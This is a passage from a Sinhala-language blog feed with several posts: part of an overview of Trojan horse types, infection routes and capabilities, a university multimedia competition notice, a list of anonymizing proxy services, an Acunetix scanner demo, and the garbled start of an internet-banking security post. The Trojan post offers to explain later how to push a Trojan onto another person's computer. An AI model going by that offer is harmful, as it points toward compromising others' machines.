අකුරක්/සංකේතයක්ම ග්රහණය කර ගන්නවා)</li><li>විනාශකාරී ට්රෝජන් අශ්වයන්</li><li>Denial of Service (DoS)</li><li>Proxy/MITM (Man In The Middle Attack) Trojans</li><li>දුරස්ත ඇතුල්වීම් ට්රෝජන් අශ්වයන් (Remote Access)</li><li>Software Detection Killers</li></ul>මෙතන සමහර දේවල් මේක කියවන සමහර අය නොදන්නවා වෙන්න පුලුවන් නමුත් මේවා දීර්ඝව විස්තර කරන්න ඕනි. ඒ වගේම මේ හා සම්බන්ද දේවල් වෙන Wrappers, Sniffers, Spoofing, Man in the Middle Attack යන ඒවාත් වෙනම විස්තර කරන්න ඕනි. මේවා මම පසුව ඉඩ ඇති හැටියට ලියන්න හිතාගෙන හිටියත් ඔබට වැදගත් කියල හිතනවනම් මට කියන්න මම ඒවාත් විස්තර කරල වෙනම ලිපි ලියන්නම්.</div><div><br /></div><div><b>ට්රෝජන් අශ්වයන් හදුන්වාදෙනු ලබන ආකාර :-</b></div><div><ul><li>චැට් හරහා (Chat Clients) - Skype, AIM, Yahoo, Facebook Chat, Google Chat, ICQ, IRC, MSN, Trillian</li><li>e-Mail පණිවුඩ වලට අමුණලා (Email Attachments)</li><li>භෞතිකව පරිඝනක පද්ධතියට ඇතුල්වීමෙන්</li><li>අන්තර්ජාල සෙවුම් මෘදුකාංග (Browser) සහ e-Mail මෘදුකාංග වල දුර්වලතා (Bugs) උපයෝගයෙන් (x-site scripting)</li><li>ගොනු හුවමාරුව (File Sharing) - සව්යංක්රීයව (Autorun) ක්රියාත්මක වෙන ට්රෝජන් අශ්වයන් Flash Drives හා CD/DVD තුලට ඇතුලත් කිරීම</li><li>Wrappers (වෙනත් වැඩ සටහන් වල සඟවා හෙවත් ඔතා එවීම)</li><li>P2P සහ වෙනත් Freeware අඩවි හරහා</li><li>News Groups - News Group අඩවියක ඇමුණුමක් සමඟ (ට්රෝජන් අශ්වයෙක් අමුණා) ප්රවෘත්ති ලිපි පල කිරීමෙන්</li><li>අනාරක්ශිත වෙබ් අඩවි හරහා බාගත කිරීමෙන්</li></ul></div><div>මේ හදුන්වා දෙන ආකාර පිළිබද දැනුවත් වීමෙන් ට්රෝජන් අශ්වයන් ඔබේ පරිඝනකයට පැනීමෙන් වලක්ව ගන්න පුලුවන්.</div><div><br /></div><div><b>පොදු වශයෙන් ට්රෝජන් අශ්වයන් භාවිතා වෙන ආකාර:-</b></div><div><ul><li>පරිඝනකයක CD-Rom එක විවෘත කිරීම</li><li>පරිඝනකයේ Screenshot ගැනීම</li><li>Key Strokes ග්රහනය සහ ඒවා පහර දෙන්නාට යැවීම</li><li>පරිඝනකයේ සියලුම ගොනු හා Drives වලට සම්පූර්ණ ඇතුලත් () වීමේ පහසුකම ලබා දීම.</li><li>ඔබේ පරිඝනකය වෙනත් හැකිං කියාවලියක් සඳහා පාලමක් ලෙස භාවිතා කිරීම.</li><li>යතුරු පුවරුව හා මූසිකය ක්රියා වියහිත කිරීම.</li></ul><div>ට්රෝජන් අශ්ව වැඩසටහන් වර්ග අපිට අන්තර්ජාලය තුලින් ලබාගෙන පාවිච්චි කරන්න පුලුවන්. එහෙම ට්රෝජන් අශ්වයෙක් යවන ආකාරය ගැන මම වෙනත් ලිපියකින් ලියන්නම්.</div><div><br /></div><div><i>ප. ලි. මම දිනපතා ලිපි ලියන්නෙ නැති නිසා ට්රෝජන් අශ්වයෙක් වෙන කෙනෙක්ගෙ පරිඝනකයට පන්නන්න ඉක්මනටම දැන ගන්න ඕනිනම් ඒක මට කියන්න මම ඉක්මනටම ඒ ගැන ලියන්නම්.</i></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com4tag:blogger.com,1999:blog-7802132138133841506.post-18189271462325571112011-09-30T20:31:00.001-07:002011-09-30T21:16:01.433-07:00පරිඝනක නිර්මාණ කරන්න කැමතිද?<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiICw9Uz7Fntd51zV895uaR9i1bjlCqgF2zqVLvdUic5ulFJFyqrDgj3UVVZYZMHDGuafLIFunrRnh6_xqZD6NIDK0cZami0oqLyVXPI65jayBiZRqKpLgdCrf72qQPtPZ92c91Kw6Jlac/s1600/bolg+gamer.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 180px; height: 48px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiICw9Uz7Fntd51zV895uaR9i1bjlCqgF2zqVLvdUic5ulFJFyqrDgj3UVVZYZMHDGuafLIFunrRnh6_xqZD6NIDK0cZami0oqLyVXPI65jayBiZRqKpLgdCrf72qQPtPZ92c91Kw6Jlac/s400/bolg+gamer.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658364139942164802" /></a></div><b>කොලඹ විශ්ව විද්යාලයීය පරිඝනක සංගමය</b> සහ <span class="Apple-style-span" style="color: rgb(50, 50, 50); font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); "><b>ශ්රී ලංකා ගුවන්විදුලි සංස්ථාව</b> එක්වී පරිඝනක නිර්මාණ තරඟාවලියක් සංවිධානය කරනවා. මෙහි මූලික අරමුණ වන්නෙ<b> </b></span><span class="Apple-style-span" style="color: rgb(50, 50, 50); font-family: Arial, Helvetica, sans-serif; line-height: 18px; background-color: rgb(255, 255, 255); "><b>සිංහල හින්දු අළුත් අවුරුදු උත්සවයේ සතුට හා වෙසක් උත්සවයේ චමත්කාරය සමග පරිගණක තාක්ෂණය නිර්මාණාත්මක ලෙස එකතු කිරීමයි</b>.</span><div><span class="Apple-style-span" ><span class="Apple-style-span" style="line-height: 18px;"><br /></span></span></div><div><span class="Apple-style-span" style="color: rgb(0, 0, 238); -webkit-text-decorations-in-effect: underline; "><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigyukPIrtqj22Fgq2Ve-geAVpdW82TGlyHjZTwt1d3mvBm1ZsUsIDKWfe9bWLkpUVLLnODLfNZQD4FpmvvgAhgYj6K5Qpr6eD5Ycw-MD8lshAUhPEHFeAAWAY5fFOb_-n51NKj2LODWB8/s400/compsoc_media_editing_workshop_and_competition.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5658370730754286706" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 300px; " /></span></div><div><div style="text-align: center;"><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" style="line-height: 18px; ">තරඟය අංශ තුනක් යටතේ සිදුවෙනවා,</span></div><div><ol><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><strong>සංස්කරණය කරන ලද ශ්රව්ය-දෘශ්ය දර්ශන - Video Editing</strong></span></span></span></li><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><strong><span class="Apple-style-span" style="font-weight: normal; "><strong>සංස්කරණය කරන ලද ශ්රව්ය කොටස් - Audio Editing</strong></span></strong></span></span></span></li><li><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="background-color: rgb(255, 255, 255); "><strong><span class="Apple-style-span" style="font-weight: normal; "><strong><span class="Apple-style-span" style="font-weight: normal; "><strong>සංස්කරණය කරන ලද ඡායාරූප - Image Editing</strong></span></strong></span></strong></span></span></span></li></ol><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;">මේ ගැන විස්තර </span></span><b><a href="http://www.compsoc.lk/en/multimedia-competition.html">කොලඹ විශ්ව විද්යාලයීය පරිඝනක සංගමයේ නිළ වෙබ් අඩවියෙන්</a> </b>ලබා ගන්න පූළුවන්. මේ තරඟාවලියට අදාල ෆේස්බුක් පිටුවට <a href="http://www.facebook.com/MediaCompetition">මෙතනින් </a>යන්න.</div></div><div><br /></div><div>මේ තරඟාවලියට සමගාමීව ඉහත අංශ යටතේම වැඩමුළු මාලාවකුත් කොළඹ විශ්ව විද්යාලීය පරිඝනක සංගමය විසින් සංවිධානය කරල තියෙනවා. ඒ ගැන විස්තර බලන්න <a href="http://www.compsoc.lk/en/workshop-on-multimedia-technologies.html">මෙතනින් </a>යන්න. මේ වැඩමුළුවෙන් ශ්රව්ය-දෘශ්ය/ශ්රව්ය හා ඡායාරූප සංස්කරණය පිලිබඳව වෘත්තීමය මට්ටමේ දැනුමක් ලබා දෙන්න අපි බලාපොරොත්තු වෙනවා. මේ වැඩමුළුව නොමිලයේ සංවිධානය කරන්නක් අතරම ඕනිම කෙනෙක්ට සහභාගී වෙන්නත් පුළුවන්. හැබැයි එක් අයෙක්ට පුළුවන් අංශ දෙකකට අදාල වැඩමුළු වලට සහභාගී වෙන්න විතරයි.</div><div><br /></div><div><span class="Apple-style-span" >මේකට සහභාගී වෙන්න <span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; line-height: 19px; background-color: rgb(255, 255, 255); ">මෙතනින් ඔන්ලයින් රික්වෙස්ට් එකක් දාන්න පුළුවන් : <a href="http://compsoc.lk/en/media-workshop-registration.html" target="_blank" style="text-decoration: none; outline-style: none; outline-width: initial; outline-color: initial; color: rgb(84, 164, 222); ">http://compsoc.lk/en/media-workshop-registration.html</a></span></span></div><div><br /></div><div><b>මේ වැඩමුළුව ඔක්තෝම්බර් මස 4 හා 5 දින වල උදේ 9 සිට සවස 5 දක්වා කොළඹ විශ්ව විද්යාලීය පරිඝනක අධ්යන අංශ (UCSC) පරිශ්රයේ පැවැත්වෙන්න නියමිතයි.</b> </div><div><b><br /></b></div><div><b><span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; line-height: 19px; background-color: rgb(255, 255, 255); "><span class="Apple-style-span" >Audio Editing වැඩමුළුව “ගාමනි” චිත්රපටයට සංගීතය සැපයූ උදිත ජයසිංහ මහතාත් UCSC සහෝදර සහෝදරියන් කිහිපදෙනෙකුත්<span class="Apple-style-span" style="font-weight: normal;"> විසින් මෙහෙයවනවා. </span>Video Editing වැඩමුළුව UCSC හි ADMTC (Advance Digital Media Technology Center)<span class="Apple-style-span" style="font-weight: normal;"> මඟින් ද </span>Image Editing වැඩමුළුව UCSC සහෝදර සහෝදරියන්<span class="Apple-style-span" style="font-weight: normal;"> විසින් ද මෙහෙයවන්න නියමිතයි.</span></span></span></b></div><div><br /></div><div><i>මම තුමා ශ්රව්ය සංස්කරණය ගැන වැඩමුළුවක් කරන්න බලාපොරොත්තු වෙන නිසා එයට සහභාගී වෙන්න කැමති අය ඉන්නවනම් මට ලියන්න mesua911@gmail.com. සීමිත ආසන ගණනක් තියෙන නිසා හා වැඩි දවසක් නැති නිසා ඉක්මනට මට කිව්වොත් කීප දෙනක්ට අවස්තාව අරන් දෙන්න පුළුවන් වේවි.</i></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-66583210608086779282011-09-30T11:50:00.000-07:002011-09-30T21:17:05.381-07:00Anonymizers - ඇත්තටම ඇනෝවෙක් වෙන්න<span class="Apple-style-span" ><a href="http://3.bp.blogspot.com/_F7GuXCzPQdY/TI7yZwT7UMI/AAAAAAAAEhQ/_luR5Nf_u5M/s1600/What-are-Anonymizers.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img src="http://3.bp.blogspot.com/_F7GuXCzPQdY/TI7yZwT7UMI/AAAAAAAAEhQ/_luR5Nf_u5M/s1600/What-are-Anonymizers.png" border="0" alt="" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 436px; height: 364px; " /></a><br /></span><div style="text-align: left; "><span class="Apple-style-span" >ඇනෝල කිව්වම බ්ලොග් අවකාශයේ ඉන්න හැමෝම දන්නවනෙ. මම හදන්නෙ ඒ අය ගැන කතා කරන්න නෙමෙයි. මම හදන්නෙ ඔබේ IP ලිපිනය සඟවල web surfing කරන්න පුළුවන් ආකාරයක් ගැන. ඒ තමයි Anonymizers.</span></div><div style="text-align: left; "><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" >ඇනොනිමයිසරයක් ඉස්සෙල්ලම හදල තියෙන්නෙ <a href="http://plone.anonymizer.com/">Anonymizer, Inc</a> කියන ආයතනය. ඇනොනිමයිසරයක් කියන්නෙ Proxy Sever එකක්. ඇනොනිමයිසරය අන්තර්ජාලයේ සැරිසරන්නාගේ පරිඝනකය සහ අන්තර්ජාලය අතර අතරමැදියෙක් විදිහට ක්රියා කරනවා. කොටින්ම ඔබ වෙනුවෙන් ඇනොනිමයිසරය අන්තර්ජාලයට සම්බන්ද වෙලා එය හරහා ඔබට අවශ්ය තොරතුරු ලබා දෙනවා සහ එමඟින් ඔබගේ පරිඝණකයේ තොරතුරු (IP address) ඔබගේ පුද්ගලික තොරතුරු සඟවනවා (ඒ කියන්නෙ ඔබගේ ලිපිනය ඔබ ඇතුල් වෙන වෙබ් පිටු හෝස්ට් වෙලා තියෙන වෙබ් සර්වර්යේ ලොග්ස් වල සටහන් වීම එමඟින් වළක්වනවා).</span></div><div><span class="Apple-style-span" ><br /></span></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhDc24oe1xC9hhlx4XRRRPNta6Bc66FvoL13ZLMVnhh77LeYJg5Ldn9nBo0LXTg5y1wgw_bprRCyDwS1Cl8OJkcsxQjw3gojIKc9LuKUWtfXbaQ1rMtDDKDNKCt6MzKyAiWzfyb1I6lhY/s1600/Anonymizer.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><span class="Apple-style-span" ><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhDc24oe1xC9hhlx4XRRRPNta6Bc66FvoL13ZLMVnhh77LeYJg5Ldn9nBo0LXTg5y1wgw_bprRCyDwS1Cl8OJkcsxQjw3gojIKc9LuKUWtfXbaQ1rMtDDKDNKCt6MzKyAiWzfyb1I6lhY/s400/Anonymizer.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5650074350745270482" style="display: block; margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; cursor: pointer; width: 400px; height: 81px; " /></span></a></div><div><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" >ඇනොනිමයිසරයක් භාවිතා කිරීමෙන් ඔබගේ හැදුනුම් සොරාගැනීමකට ලක් වීමේ ඉඩ ඇසිරෙනවා. එනිසා එය ඔබගේ වෙබ් අවකාශයේ ආරක්ශාවට වැදගත්. ඔබ හිතනවා ඇති ඇයි මම IP address සහ ඔබව අනාවරණය වන තොරතුරු සඟවන්නෙ කියල. කොටින්ම අපි මහපාරෙ යනකොට මම මෙයයි කියල ID card එක වන වනා කෑ ගහගෙන යන්නෙ නැහැනෙ. මෙතනත් එයටම සමාන අවස්තාවක්. ඔබ අන්තර්ජාලයේ යම් වෙබ් පිටුවකට ඇතුල් වෙනකොට ඔබේ තොරතුරු ඔවුන් දැන ගැනීම අවශ්ය නොවෙනවා කියල තමයි මම හිතන්නෙ. ඒ නිසා ඇනොනිමයිසරය ඉතාමත් වැදගත් අන්තර්ජාලය තුල ඔබව ආරක්ශා කර ගැනීමට.</span></div><div><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" >නමුත් ඇනොනිමයිසරයන් ප්රායෝගික තලයේදි භාවිතා වෙන්නෙ තමන් ආරක්ශා වෙනවාට වඩා අනුන්ගෙ ආරක්ශාවට තර්ජනයක් ඇති කරන්න. විශේෂයෙන්ම විවිධ මානසික ප්රශ්ණ තියෙන පුද්ගලයො තමන්ගෙ තොරතුරු සඟවන්න මේවා භාවිතා කරනවා (ඔය බ්ලොග් වල කුණුහරුප එහෙම ලියන්නෙ). ළමා අපයෝජන අසභය චිත්රපට වැඩි වශයෙන් හුවමාරු කිරීමට සහ නැරඹීමට ඇනොනිමයිසරයන් භාවිතා වීම ඇනොනිමයිසරයන් නිසා ඇතිවී තිබෙන ගැටළුකාරී තත්වයක් බව විකිපීඩියාව පවසනවා.</span></div><div><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" >මෙමඟින් අවසානයට හිතන්න පුළුවන් ඇනොනිමයිසරය කියන්නෙ එක හා සමානව හොඳට හා නරකට භාවිතා කරන්න පුළුවන් දෙයක්. නමුත් අනවශ්ය වෙබ් පිටුවල තමන්ගේ අනන්යතාවය සටහන් වෙනවට අකමැති අයට පාවිච්චි කරන්න හොඳ ඇනොනිමයිසරයන් කිහිපයක් මම පහලින් සදහන් කරන්නම්.</span></div><div><span class="Apple-style-span" ><br /></span></div><div><span class="Apple-style-span" style="color: rgb(51, 51, 51); line-height: 19px; background-color: rgb(255, 255, 255); "><ul><span class="Apple-style-span" ><li><a href="http://anonymouse.ws/" target="_blank" style="color: rgb(169, 27, 51); text-decoration: none; "><strong>Anonymouse</strong></a> - මෙය ඉතා හොඳ <span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Georgia, serif; line-height: normal; ">ඇනොනිමයිසරයක් සහ මෙය නොමිලයේ බාගත කරන්න පුලුවන්</span> . මේකෙ පාවිච්චි වෙන්නෙ CGI proxy එකක්, එයින් ඔබට anonymously වෙබ් පිටුවල සැරිසරන්න, anonymous e-mails යවන්න හැකියාව ලබා දෙනවා.</li><br /><li><a href="http://www.proxyking.net/" target="_blank" style="color: rgb(169, 27, 51); text-decoration: none; "><strong>ProxyKing.net</strong></a> - මේ <span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Georgia, serif; line-height: normal; ">ඇනොනිමයිසර සේවාව වෙබ් අඩවි වලට ඔබව හසු (track) කිරීමට වැලකීම සහ ඔබගේ පරිගනකයේ</span> cookies ස්තාපනය කිරීමේ හැකියාව වලකනවා.</li><br /><li><a href="http://www.anonymousindex.com/" target="_blank" style="color: rgb(169, 27, 51); text-decoration: none; "><strong>AnonymousIndex.com</strong></a> - මෙය IP ලිපිනය සැඟවීම, වෙබ් පිටුවල දිස් වන දැන්වීම්, referrers සහ cookies කලමනාකරණය කරන අන්තර්ජාලයේ නොමිලයේ පවතින ප්රොක්සි සර්වර් එකක්.</li><br /><li><a href="http://www.hidemyass.com/" target="_blank" style="color: rgb(169, 27, 51); text-decoration: none; "><strong>HideMyAss.com</strong></a> - නොමිලයේ ලබා දෙන <span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Georgia, serif; line-height: normal; ">ඇනොනිමයිසර</span> සේවාවක්.</li><br /><li><a href="http://www.proxyfoxy.com/" target="_blank" style="color: rgb(169, 27, 51); text-decoration: none; "><strong>ProxyFoxy.com</strong></a> - නොමිලයේ ලබා දෙන <span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Georgia, serif; line-height: normal; ">ඇනොනිමයිසර</span> සේවාවක් සහ මෙමඟින් cookies, spyware සහ වෙනත් අනතුරුදායක scripts මඟහැරීම සිදුකරනවා.</li></span></ul></span></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com7tag:blogger.com,1999:blog-7802132138133841506.post-358578211359774122011-09-14T06:36:00.000-07:002011-09-14T06:44:39.348-07:00Acunetix Web Vulnerability Scanner - DemostrationI made this video for one of my assignments at University. This video shows how to use Acnetix WVS software at basic level.<br /><br /><div style="text-align: center;"><iframe src="http://www.youtube.com/embed/tT9B-V5bZW0" allowfullscreen="" frameborder="0" height="345" width="420"></iframe><br /><br /><div style="text-align: left;">You can use Acunetix WVS to scan your website to find what are the vulnerabilities the web site have.<br /><br />You can download this software form <a href="http://www.acunetix.com/">Acunetix </a>website.<br /></div></div>Nimeshhttp://www.blogger.com/profile/09089803672510786091noreply@blogger.com0tag:blogger.com,1999:blog-7802132138133841506.post-32691723182077959842011-09-14T05:35:00.000-07:002012-01-10T10:02:44.245-08:00Security of Internet Banking (Part 3) - Countermeasures to Reduce Risks in Internet Banking<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz3FRStPR6oIvMFqHRjt96zAgl39hJDOilFQ-Be5te1cwblojysyPm3ub8-olS9klMUocVMUTEpRuXMakpWLfGA70kOzWf-PcgKWOKRNbdKddyUhgtVmcARcydtgK8WO9ZEEgrrfVqmY/s1600/11.jpg"><br /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj26wkqEYx2Kr7Y1u_gOEMOfs8rdj5V6it4Ar_HpFQwezLaDEcAA1gJLkWpaoSCuokPJrYqwZuR1rvFVtXua2v1r10chJKymWvFNKVQF-KqC291yvZE6NPYrrRe4Jc_RrB4kSv6oFkUxbw/s1600/sds.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 262px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj26wkqEYx2Kr7Y1u_gOEMOfs8rdj5V6it4Ar_HpFQwezLaDEcAA1gJLkWpaoSCuokPJrYqwZuR1rvFVtXua2v1r10chJKymWvFNKVQF-KqC291yvZE6NPYrrRe4Jc_RrB4kSv6oFkUxbw/s400/sds.jpg" alt="" id="BLOGGER_PHOTO_ID_5652195457501707618" border="0" /></a><br /><!--[if gte mso 9]><xml> <o:officedocumentsettings> <o:relyonvml/> <o:allowpng/> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:trackmoves/> <w:trackformatting/> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:donotpromoteqf/> <w:lidthemeother>EN-US</w:LidThemeOther> <w:lidthemeasian>X-NONE</w:LidThemeAsian> <w:lidthemecomplexscript>SI-LK</w:LidThemeComplexScript> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> <w:splitpgbreakandparamark/> <w:dontvertaligncellwithsp/> <w:dontbreakconstrainedforcedtables/> <w:dontvertalignintxbx/> <w:word11kerningpairs/> <w:cachedcolbalance/> </w:Compatibility> <m:mathpr> <m:mathfont val="Cambria Math"> <m:brkbin val="before"> <m:brkbinsub val="--"> <m:smallfrac val="off"> <m:dispdef/> <m:lmargin val="0"> <m:rmargin val="0"> <m:defjc val="centerGroup"> <m:wrapindent val="1440"> <m:intlim val="subSup"> <m:narylim val="undOvr"> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"> <w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"> <w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"> <w:lsdexception locked="false" priority="39" name="toc 1"> <w:lsdexception locked="false" priority="39" name="toc 2"> <w:lsdexception locked="false" priority="39" name="toc 3"> <w:lsdexception locked="false" priority="39" name="toc 4"> <w:lsdexception locked="false" priority="39" name="toc 5"> <w:lsdexception locked="false" priority="39" name="toc 6"> <w:lsdexception locked="false" priority="39" name="toc 7"> <w:lsdexception locked="false" priority="39" name="toc 8"> <w:lsdexception locked="false" priority="39" name="toc 9"> <w:lsdexception locked="false" priority="35" qformat="true" name="caption"> <w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"> <w:lsdexception locked="false" priority="1" name="Default Paragraph Font"> <w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"> <w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"> <w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"> <w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"> <w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"> <w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"> <w:lsdexception locked="false" unhidewhenused="false" name="Revision"> <w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"> <w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"> <w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"> 